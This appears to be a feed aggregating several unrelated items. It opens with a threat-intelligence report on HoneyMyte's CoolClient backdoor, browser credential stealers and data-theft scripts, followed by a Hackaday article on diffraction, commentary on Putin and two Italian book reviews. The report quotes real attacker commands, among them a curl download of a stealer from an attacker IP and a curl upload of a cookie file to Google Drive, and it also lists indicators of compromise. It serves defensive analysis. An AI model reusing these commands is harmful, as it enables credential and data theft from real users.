HoneyMyte updates CoolClient and deploys multiple stealers in recent campaigns

Over the past few years, we’ve been observing and monitoring the espionage activities of HoneyMyte (aka Mustang Panda or Bronze President) within Asia and Europe, with the Southeast Asia region being the most affected. The primary targets of most of the group’s campaigns were government entities.

As an APT group, HoneyMyte uses a variety of sophisticated tools to achieve its goals. These tools include ToneShell, PlugX, Qreverse and CoolClient backdoors, Tonedisk and SnakeDisk USB worms, among others. In 2025, we observed HoneyMyte updating its toolset by enhancing the CoolClient backdoor with new features, deploying several variants of a browser login data stealer, and using multiple scripts designed for data theft and reconnaissance.

Additional information about this threat, including indicators of compromise, is available to customers of the Kaspersky Intelligence Reporting Service. If you are interested, please contact intelreports@kaspersky.com.

CoolClient backdoor

An early version of the CoolClient backdoor was first discovered by Sophos in 2022, and TrendMicro later documented an updated version in 2023. Fast forward to our recent investigations, we found that CoolClient has evolved quite a bit, and the developers have added several new features to the backdoor. This updated version has been observed in multiple campaigns across Myanmar, Mongolia, Malaysia and Russia where it was often deployed as a secondary backdoor in addition to PlugX and LuminousMoth infections.

In our observations, CoolClient was typically delivered alongside encrypted loader files containing encrypted configuration data, shellcode, and in-memory next-stage DLL modules. These modules relied on DLL sideloading as their primary execution method, which required a legitimate signed executable to load a malicious DLL. Between 2021 and 2025, the threat actor abused signed binaries from various software products, including BitDefender, VLC Media Player, Ulead PhotoImpact, and several Sangfor solutions.

Variants of CoolClient abusing different software for DLL sideloading (2021–2025)

The latest CoolClient version analyzed in this article abuses legitimate software developed by Sangfor. Below, you can find an overview of how it operates. It is worth noting that its behavior remains consistent across all variants, except for differences in the final-stage features.

Overview of CoolClient execution flow

However, it is worth noting that in another recent campaign involving this malware in Pakistan and Myanmar, we observed that HoneyMyte has introduced a newer variant of CoolClient that drops and executes a previously unseen rootkit. A separate report will be published in the future that covers the technical analysis and findings related to this CoolClient variant and the associated rootkit.

CoolClient functionalities

In terms of functionality, CoolClient collects detailed system and user information. This includes the computer name, operating system version, total physical memory (RAM), network details (MAC and IP addresses), logged-in user information, and descriptions and versions of loaded driver modules. Furthermore, both old and new variants of CoolClient support file upload to the C2, file deletion, keylogging, TCP tunneling, reverse proxy listening, and plugin staging/execution for running additional in-memory modules. These features are still present in the latest versions, alongside newly added functionalities.

In this latest variant, CoolClient relies on several important files to function properly:

Parameter modes in second-stage DLL

CoolClient typically requires three parameters to function properly. These parameters determine which actions the malware is supposed to perform. The following parameters are supported.

Final stage DLL

The write.exe process decrypts and launches the main.dat file, which contains the third (final) stage DLL. CoolClient’s core features are implemented in this DLL. When launched, it first checks whether the keylogger, clipboard stealer, and HTTP proxy credential sniffer are enabled. If they are, CoolClient creates a new thread for each specific functionality. It is worth noting that the clipboard stealer and HTTP proxy credential sniffer are new features that weren’t present in older versions.

Clipboard and active windows monitor

A new feature introduced in CoolClient is clipboard monitoring, which leverages functions that are typically abused by clipboard stealers, such as GetClipboardData and GetWindowTextW, to capture clipboard information.

CoolClient also retrieves the window title, process ID and current timestamp of the user’s active window using the GetWindowTextW API. This information enables the attackers to monitor user behavior, identify which applications are in use, and determine the context of data copied at a given moment.

The clipboard contents and active window information are encrypted using a simple XOR operation with the byte key 0xAC, and then written to a file located at C:\ProgramData\AppxProvisioning.xml.

HTTP proxy credential sniffer

Another notable new functionality is CoolClient’s ability to extract HTTP proxy credentials from the host’s HTTP traffic packets. To do so, the malware creates dedicated threads to intercept and parse raw network traffic on each local IP address. Once it is able to intercept and parse the traffic, CoolClient starts extracting proxy authentication credentials from HTTP traffic intercepted by the malware’s packet sniffer.

The function operates by analyzing the raw TCP payload to locate the Proxy-Connection header and ensure the packet is relevant. It then looks for the Proxy-Authorization: Basic header, extracts and decodes the Base64-encoded credential and saves it in memory to be sent later to the C2.

Function used to find and extract Base64-encoded credentials from HTTP proxy-authorization headers

C2 command handler

The latest CoolClient variant uses TCP as the main C2 communication protocol by default, but it also has the option to use UDP, similar to the previous variant. Each incoming payload begins with a four-byte magic value to identify the command family. However, if the command is related to downloading and running a plugin, this value is absent. If the client receives a packet without a recognized magic value, it switches to plugin mode (mechanism used to receive and execute plugin modules in memory) for command processing.

0xFFAABBCC – Beacon and configuration commands

Below is the command menu to manage client status and beaconing:

0xFFAABBCD – Operational commands

This command group implements functionalities such as data theft, proxy setup, and file manipulation. The following is a breakdown of known subcommands:

CoolClient plugins

CoolClient supports multiple plugins, each dedicated to a specific functionality. Our recent findings indicate that the HoneyMyte group actively used CoolClient in campaigns targeting Mongolia, where the attackers pushed and executed a plugin named FileMgrS.dll through the C2 channel for file management operations.

Further sample hunting in our telemetry revealed two additional plugins: one providing remote shell capability (RemoteShellS.dll), and another focused on service management (ServiceMgrS.dll).

ServiceMgrS.dll – Service management plugin

This plugin is used to manage services on the victim host. It can enumerate all services, create new services, and even delete existing ones. The following table lists the command IDs and their respective actions.

FileMgrS.dll – File management plugin

A few basic file operations are already supported in the operational commands of the main CoolClient implant, such as listing directory contents and deleting files. However, the dedicated file management plugin provides a full set of file management capabilities.

RemoteShellS.dll – Remote shell plugin

Based on our analysis of the main implant, the C2 command handler did not implement remote shell functionality. Instead, CoolClient relied on a dedicated plugin to enable this capability. This plugin spawns a hidden cmd.exe process, redirecting standard input and output through pipes, which allows the attacker to send commands into the process and capture the resulting output. This output is then forwarded back to the C2 server for remote interaction.

CoolClient plugin that spawns cmd.exe with redirected I/O and forwards command output to C2

Browser login data stealer

While investigating suspicious ToneShell backdoor traffic originating from a host in Thailand, we discovered that the HoneyMyte threat actor had downloaded and executed a malware sample intended to extract saved login credentials from the Chrome browser as part of their post-exploitation activities. We will refer to this sample as Variant A. On the same day, the actor executed a separate malware sample (Variant B) targeting credentials stored in the Microsoft Edge browser. Both samples can be considered part of the same malware family.

During a separate threat hunting operation focused on HoneyMyte’s QReverse backdoor, we retrieved another variant of a Chrome credential parser (Variant C) that exhibited significant code similarities to the sample used in the aforementioned ToneShell campaign.

The malware was observed in countries such as Myanmar, Malaysia, and Thailand, with a particular focus on the government sector.

The following table shows the variants of this browser credential stealer employed by HoneyMyte.

These stealers may be part of a new malware toolset used by HoneyMyte during post-exploitation activities.

Initial infection

As part of post-exploitation activity involving the ToneShell backdoor, the threat actor initially executed the Variant A stealer, which targeted Chrome credentials. However, we were unable to determine the exact delivery mechanism used to deploy it.

A few minutes later, the threat actor executed a command to download and run the Variant B stealer from a remote server. This variant specifically targeted Microsoft Edge credentials.
curl hxxp://45.144.165[.]65/BUIEFuiHFUEIuioKLWENFUoi878UIESf/MUEWGHui897hjkhsjdkHfjegfdh/67jksaebyut8seuhfjgfdgdfhet4SEDGF/Tools/getlogindataedge.exe -o "C:\users\[username]\libraries\getloginedge.exe"
Within the same hour that Variant B was downloaded and executed, we observed the threat actor issue another command to exfiltrate the Firefox browser cookie file (cookies.sqlite) to Google Drive using a curl command.
curl -X POST -L -H "Authorization: Bearer ya29.a0Ad52N3-ZUcb-ixQT_Ts1MwvXsO9JwEYRujRROo-vwqmSW006YxrlFSRjTuUuAK-u8UiaQt7v0gQbjktpFZMp65hd2KBwnY2YdTXYAKhktWi-v1LIaEFYzImoO7p8Jp01t29_3JxJukd6IdpTLPdXrKINmnI9ZgqPTWicWN4aCgYKAQ4SARASFQHGX2MioNQPPZN8EkdbZNROAlzXeQ0174" -F "metadata={name :'8059cookies.sqlite'};type=application/json;charset=UTF-8" -F "file=@"$appdata\Mozilla\Firefox\Profiles\i6bv8i9n.default-release\cookies.sqlite";type=application/zip" -k "https://www.googleapis.com/upload/drive/v3/files?uploadType=multipart"

Variant C analysis

Unlike Variants A and B, which use hardcoded file paths, the Variant C stealer accepts two runtime arguments: file paths to the browser’s Login Data and Local State files. This provides greater flexibility and enables the stealer to target any Chromium-based browser such as Chrome, Edge, Brave, or Opera, regardless of the user profile or installation path. An example command used to execute Variant C is as follows:
Jarte.exe "C:\Users\[username]\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\[username]\AppData\Local\Google\Chrome\User Data\Local State"
In this context, the Login Data file is an SQLite database that stores saved website login credentials, including usernames and AES-encrypted passwords. The Local State file is a JSON-formatted configuration file containing browser metadata, with the most important value being encrypted_key, a Base64-encoded AES key. It is required to decrypt the passwords stored in the Login Data database and is also encrypted.

When executed, the malware copies the Login Data file to the user’s temporary directory as chromeTmp.

Function that copies Chrome browser login data into a temporary file (chromeTmp) for exfiltration

To retrieve saved credentials, the malware executes the following SQL query on the copied database:
SELECT origin_url, username_value, password_value FROM logins
This query returns the login URL, stored username, and encrypted password for each saved entry.

Next, the malware reads the Local State file to extract the browser’s encrypted master key. This key is protected using the Windows Data Protection API (DPAPI), ensuring that the encrypted data can only be decrypted by the same Windows user account that created it. The malware then uses the CryptUnprotectData API to decrypt this key, enabling it to access and decrypt password entries from the Login Data SQLite database.

With the decrypted AES key in memory, the malware proceeds to decrypt each saved password and reconstructs complete login records.

Finally, it saves the results to the text file C:\Users\Public\Libraries\License.txt.

Login data stealer’s attribution

Our investigation indicated that the malware was consistently used in the ToneShell backdoor campaign, which was attributed to the HoneyMyte APT group.
Another factor supporting our attribution is that the browser credential stealer appeared to be linked to the LuminousMoth APT group, which has previously been connected to HoneyMyte. Our analysis of LuminousMoth’s cookie stealer revealed several code-level similarities with HoneyMyte’s credential stealer. For example, both malware families used the same method to copy targeted files, such as Login Data and Cookies, into a temporary folder named ChromeTmp, indicating possible tool reuse or a shared codebase.

Code similarity between HoneyMyte’s saved login data stealer and LuminousMoth’s cookie stealer

Both stealers followed the same steps: they checked if the original Login Data file existed, located the temporary folder, and copied the browser data into a file with the same name.

Based on these findings, we assess with high confidence that HoneyMyte is behind this browser credential stealer, which also has a strong connection to the LuminousMoth APT group.

Document theft and system information reconnaissance scripts

In several espionage campaigns, HoneyMyte used a number of scripts to gather system information, conduct document theft activities and steal browser login data. One of these scripts is a batch file named 1.bat.

1.bat – System enumeration and data exfiltration batch script

The script starts by downloading curl.exe and rar.exe into the public folder. These are the tools used for file transfer and compression.

Batch script that downloads curl.exe and rar.exe from HoneyMyte infrastructure and executes them for file transfer and compression

It then collects network details and downloads and runs the nbtscan tool for internal network scanning.

Batch script that performs network enumeration and saves the results to the log.dat file for later exfiltration

During enumeration, the script also collects information such as stored credentials, the result of the systeminfo command, registry keys, the startup folder list, the list of files and folders, and antivirus information into a file named log.dat. It then uploads this file via FTP to http://113.23.212[.]15/pub/.

Batch script that collects registry, startup items, directories, and antivirus information for system profiling

Next, it deletes both log.dat and the nbtscan executable to remove traces. The script then terminates browser processes, compresses browser-related folders, retrieves FileZilla configuration files, archives documents from all drives with rar.exe, and uploads the collected data to the same server.

Finally, it deletes any remaining artifacts to cover its tracks.

Ttraazcs32.ps1 – PowerShell-based collection and exfiltration

The second script observed in HoneyMyte operations is a PowerShell file named Ttraazcs32.ps1.

Similar to the batch file, this script downloads curl.exe and rar.exe into the public folder to handle file transfers and compression. It collects computer and user information, as well as network details such as the public IP address and Wi-Fi network data.

All gathered information is written to a file, compressed into a password-protected RAR archive and uploaded via FTP.

In addition to system profiling, the script searches multiple drives including C:\Users\Desktop, Downloads, and drives D: to Z: for recently modified documents. Targeted file types include .doc, .xls, .pdf, .tif, and .txt, specifically those changed within the last 60 days. These files are also compressed into a password-protected RAR archive and exfiltrated to the same FTP server.

t.ps1 – Saved login data collection and exfiltration

The third script attributed to HoneyMyte is a PowerShell file named t.ps1.

The script requires a number as a parameter and creates a working directory under D:\temp with that number as the directory name. The number is not related to any identifier. It is simply a numeric label that is probably used to organize stolen data by victim. If the D drive doesn’t exist on the victim’s machine, the new folder will be created in the current working directory.

The script then searches the system for Chrome and Chromium-based browser files such as Login Data and Local State. It copies these files into the target directory and extracts the encrypted_key value from the Local State file. It then uses Windows DPAPI (System.Security.Cryptography.ProtectedData) to decrypt this key and writes the decrypted Base64-encoded key into a new file named Local State-journal in the same directory. For example, if the original file is C:\Users\$username \AppData\Local\Google\Chrome\User Data\Local State, the script creates a new file C:\Users\$username\AppData\Local\Google\Chrome\User Data\Local State-journal, which the attacker can later use to access stored credentials.

PowerShell script that extracts and decrypts the Chrome encrypted_key from the Local State file before writing the result to a Local State-journal file

Once the credential data is ready, the script verifies that both rar.exe and curl.exe are available. If they are not present, it downloads them directly from Google Drive. The script then compresses the collected data into a password-protected archive (the password is “PIXELDRAIN”) and uploads it to pixeldrain.com using the service’s API, authenticated with a hardcoded token. Pixeldrain is a public file-sharing service that attackers abuse for data exfiltration.

Script that compresses data with RAR, and exfiltrates it to Pixeldrain via API

This approach highlights HoneyMyte’s shift toward using public file-sharing services to covertly exfiltrate sensitive data, especially browser login credentials.

Conclusion

Recent findings indicate that HoneyMyte continues to operate actively in the wild, deploying an updated toolset that includes the CoolClient backdoor, a browser login data stealer, and various document theft scripts.

With capabilities such as keylogging, clipboard monitoring, proxy credential theft, document exfiltration, browser credential harvesting, and large-scale file theft, HoneyMyte’s campaigns appear to go far beyond traditional espionage goals like document theft and persistence. These tools indicate a shift toward the active surveillance of user activity that includes capturing keystrokes, collecting clipboard data, and harvesting proxy credential.

Organizations should remain highly vigilant against the deployment of HoneyMyte’s toolset, including the CoolClient backdoor, as well as related malware families such as PlugX, ToneShell, Qreverse, and LuminousMoth. These operations are part of a sophisticated threat actor strategy designed to maintain persistent access to compromised systems while conducting high-value surveillance activities.

Indicators of compromise

CoolClient
F518D8E5FE70D9090F6280C68A95998F libngs.dll
1A61564841BBBB8E7774CBBEB3C68D5D loader.dat
AEB25C9A286EE4C25CA55B72A42EFA2C main.dat
6B7300A8B3F4AAC40EEECFD7BC47EE7C time.dat

CoolClient plugins
7AA53BA3E3F8B0453FFCFBA06347AB34 ServiceMgrS.dll
A1CD59F769E9E5F6A040429847CA6EAE FileMgrS.dll
1BC5329969E6BF8EF2E9E49AAB003F0B RemoteShellS.dll

Browser login data stealer
1A5A9C013CE1B65ABC75D809A25D36A7 Variant A
E1B7EF0F3AC0A0A64F86E220F362B149 Variant B
DA6F89F15094FD3F74BA186954BE6B05 Variant C

Scripts
C19BD9E6F649DF1DF385DEEF94E0E8C4 1.bat
838B591722512368F81298C313E37412 Ttraazcs32.ps1
A4D7147F0B1CA737BFC133349841AABA t.ps1

CoolClient C2
account.hamsterxnxx[.]com
popnike-share[.]com
japan.Lenovoappstore[.]com

FTP server
113.23.212[.]15

securelist.com/honeymyte-updat…

Why Diffraction Gratings Create Fourier Transforms

When last we saw [xoreaxeax], he had built a lens-less optical microscope that deduced the structure of a sample by recording the diffraction patterns formed by shining a laser beam through it. At the time, he noted that the diffraction pattern was a frequency decomposition of the specimen’s features – in other terms, a Fourier transform. Now, he’s back with an explanation of why this is, deriving equations for the Fourier transform from the first principles of diffraction (German video, but with auto-translated English subtitles. Beware: what should be “Huygens principle” is variously translated as “squirrel principle,” “principle of hearing,” and “principle of the horn”).

The first assumption was that light is a wave that can be adequately represented by a sinusoidal function. For the sake of simplicity (you’ll have to take our word for this), the formula for a sine wave was converted to a complex number in exponential form. According to the Huygens principle, when light emerges from a point in the sample, it spreads out in spherical waves, and the wave at a given point can therefore be calculated simply as a function of distance. The principle of superposition means that whenever two waves pass through the same point, the amplitude at that point is the sum of the two. Extending this summation to all the various light sources emerging from the sample resulted in an infinite integral, which simplified to a particular form of the Fourier transform.

One surprising consequence of the relation is the JPEG representation of a micrograph of some onion cells. JPEG compression calculates the Fourier transform of an image and stores it as a series of sine-wave striped patterns. If one arranges tiles of these striped patterns according to stripe frequency and orientation, then shades each tile according to that pattern’s contribution to the final image, one gets a speckle pattern with a bright point in the center. This closely resembles the diffraction pattern created by shining a laser through those onion cells.

For the original experiment that generated these patterns, check out [xoreaxeax]’s original ptychographical microscope. Going in the opposite direction, researchers have also used physical structures to calculate Fourier transforms.

youtube.com/embed/zjw9lhaivTY?…

hackaday.com/2026/01/27/why-di…

#Russia political commentator Vladimir Pastukhov on #Putin and war:

An interesting question: will Putin risk continuing without war? After all, for him, this is also like jumping into an ice hole. War is an area of maximum political comfort for him.

War is a powerful political tranquilliser that shuts down the critical consciousness of the ‘aggressively passive majority.’ Without war, this majority becomes disorganised and unstable, and it becomes vulnerable to the influence of social elements that are ‘destructive’ to the regime.

However, war also has disadvantages:

What has happened to make us think that Putin might want to withdraw from the war? The fact is that all of the above works like clockwork only under one condition: the war is being fought successfully. And the war in Ukraine is no longer successful for Russia. And the fact that it now looks even less successful for Ukraine does not change the essence of the matter.

And there’s this very nice “alchemist” analogy:

All this, in my opinion, suggests that Putin is currently in a tense situation. He is carefully weighing up the risks for himself: the risk of continuing the war and the risk of ending it. Like a medieval alchemist, he is searching for a formula to end the war that will transform the manure heap of its unforeseen complications into a gold medal for the victorious hero, and if he thinks he has found it, he will take the risk.

echofm.online/opinions/risknet… (in Russian)

Le disavventure della verità

La verità è un concetto mobile e sfuggente, i cui confini cambiano in relazione alla temperie culturale e all’azione dei soggetti che hanno i mezzi per costruirla e farla accettare.

Già nel V secolo però, Platone metteva in guardia i cittadini di Atene che per instaurare la democrazia bisognava cacciare i retori e i sofisti, che ingannano il popolo con sillogismi, paralogismi, notizie false e inventate.

Ma la società della comunicazione, basata su persuasione e populismo, non è in grado di scacciare i nuovi retori che assumono le vesti di imbonitori e tribuni di un popolo costruito algoritmicamente.

Nel libro «Le disavventure della verità», il filosofo Umberto Galimberti affronta così il tema della verità in un’ottica comparata confrontando Marx, Nietsche e Freud nelle loro pubblicazioni meno note. Ovviamente con riferimento alla Repubblica di Platone e a quello sfortunato che informò i cavernicoli che erano oggetto di un’illusione (disinformazione, diremmo oggi). Lo sfortunato fu bastonato dai cavernicoli per la sua rivelazione.

[…] a differenza dei tempi trascorsi, oggi l’abbondanza delle informazioni, che è il tratto tipico del nostro tempo, ci rende responsabili di ciò che sappiamo e se, per quieto vivere, per noia, per distrazione, per disinteresse, per stanchezza o per assuefazione, non siamo sensibili al problema della verità, di fronte a quel che sappiamo diventiamo irrimediabilmente indifferenti, quando non addirittura immorali.

Oggi, infatti, dobbiamo chiederci che ne è della verità nella nostra epoca caratterizzata dall’incontenibile diffusione dei media, ai quali da ultimo si sono aggiunti i social con le loro vere e false notizie e prese di posizioni, per lo più acritiche, quando non puri sfoghi pulsionali o emotivi. Per affrontare questo tema bisogna liquidare quei luoghi comuni, per non dire idee arretrate che fanno da tacita guida a quasi tutte le riflessioni sui media, secondo le quali l’uomo può usare i mezzi di comunicazione come qualcosa di neutrale rispetto alla sua natura… […]

Al tempo della guerra ibrida, quella che mescola la falsa informazione alle azioni militari, il sabotaggio della verità ci riguarda tutti.

«Le disavventure della verità», Umberto Galimberti, Feltrinelli, 2025

dicorinto.it/articoli/recensio…

Il momento straussiano

Palantir è il nuovo potere della sorveglianza globale. Anche i Servizi Segreti francesi hanno ammesso di usarne tecnologia e capacità di analisi. E lo fanno pure la Ferrari, Stellantis, il Policlinico Gemelli in Italia.
I software di Palantir sono in uso anche all’esercito israeliano. Il suo board nel 2024 ha tenuto una seduta del consiglio di amministrazione a Tel Aviv in segno di solidarietà dopo l’attacco terroristico del 7 ottobre 2023.

Ma che cos’è Palantir? Palantir è la nuova macchina del potere americano creata da Peter Thiel, il magnate che ha fondato l’azienda prendendone il nome dalla saga del Signore degli Anelli. Palantir è l’occhio che tutto vede e che nella saga consente ai cattivi di intimidire, trovare e punire, non i cattivi, ma i buoni della storia, cioè la famosa compagnia dell’Anello.

Nella prospettiva di Thiel e di Alex Karp, attuale Ceo di Palantir, però è tutto rovesciato. L’occhio che tutto vede, cioè i suoi software Gotham e Foundry, potenziati dal coordinamento di una terza piattaforma, Apollo, e dall’intelligenza artificiale IAP, sono gli strumenti della nuova sorveglianza che sovrintende alla macchina da guerra americana e degli eserciti che se lo possono permettere. Come quello di Israele.

Palantir è una macchina indifferente all’etica e alla morale occidentale e illuministica.
Dopo alcuni servizi giornalistici sappiamo che Palantir, vende dati per fare la guerra. E poi li usa per foraggiare il suo spin off, Anduril, azienda dedicata alla produzione di IA e droni da combattimento.

Ma è solo nel libro «Il momento straussiano» che capiamo perché Peter Thiel, tecnologo, gay, cattolico, conservatore, con Palantir si sia definitivamente sganciato dalla retorica di benessere, progresso e uguaglianza prodotta dall’immaginifica
industria della Silicon Valley negli ultimi 30 anni fino a farla ribaltare nelle sue convinzioni più profonde, un tempo basate sul «don’t be evil» (non fare il male).
Nel libro Thiel lo spiega. E quello che dice fa venire i brividi, affermando che l’Occidente deve farsi rispettare usando la violenza e la deterrenza quali elementi attivi di civilizzazione e di difesa della sua missione teleologica e salvifica del mondo.
Usando cioè i mezzi contrari alla cultura occidentale dei diritti che essa dovrebbero affermare e perseguire.

«Peter Thiel, Il momento straussiano. A cura di Andrea Venanzoni. Liberilibri 2025»

dicorinto.it/articoli/recensio…